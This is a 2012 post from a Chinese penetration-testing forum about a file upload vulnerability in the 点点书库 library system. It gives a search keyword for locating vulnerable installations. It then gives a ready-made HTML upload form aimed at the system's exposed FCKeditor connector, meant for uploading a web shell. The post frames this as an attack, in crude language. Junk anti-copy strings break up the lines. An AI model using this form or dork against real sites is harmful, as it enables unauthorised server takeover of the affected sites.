中国网络渗透测试联盟
标题:
点点书库图书馆系统文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-9-10 21:20
标题:
点点书库图书馆系统文件上传漏洞
主题:图书馆系统任意文件上传漏洞
; `1 F3 n4 ~, a* t
作者:冰锋刺客
. b5 J9 [' r/ P B% N
厂商:点击书(dianjishu.com)
i9 b9 Y7 g( I
日期:2012-6-21
& s) R: U' m( j( e
5 Y5 @& u- r# ~. y3 q
I 概述
& T0 g: d) ]% J1 v" J% t, D0 F$ k+ h
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
! x9 `- K z8 Z
II 简介
r. A& n0 H }- [- z7 J o
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
7 X& N+ A2 o& }' l% h. u1 J
补充一个漏洞
( z6 o% z8 H9 g8 I, [$ u+ K! c
<form id="frmUpload" enctype="multipart/form-data"
) s& ]9 R. ^5 f
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
) K% I9 K3 P$ Q
<input id="btnUpload" type="submit" value="操翻他">
3 s! y% Z9 E) k% t; S$ m' _
</form>
2 E9 I* R/ g. E
你们懂的
% L1 B: e% Z7 N: M. z0 C
那傻逼提供还需要改包.
( _" F. ?& [& i! l4 Z$ _. [5 I
自己看了下源代码发现fckeditor
! w* o9 W8 Z, ?! V$ X6 d
直接秒杀
1 @ B5 ^+ }# Y- F- i0 m
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2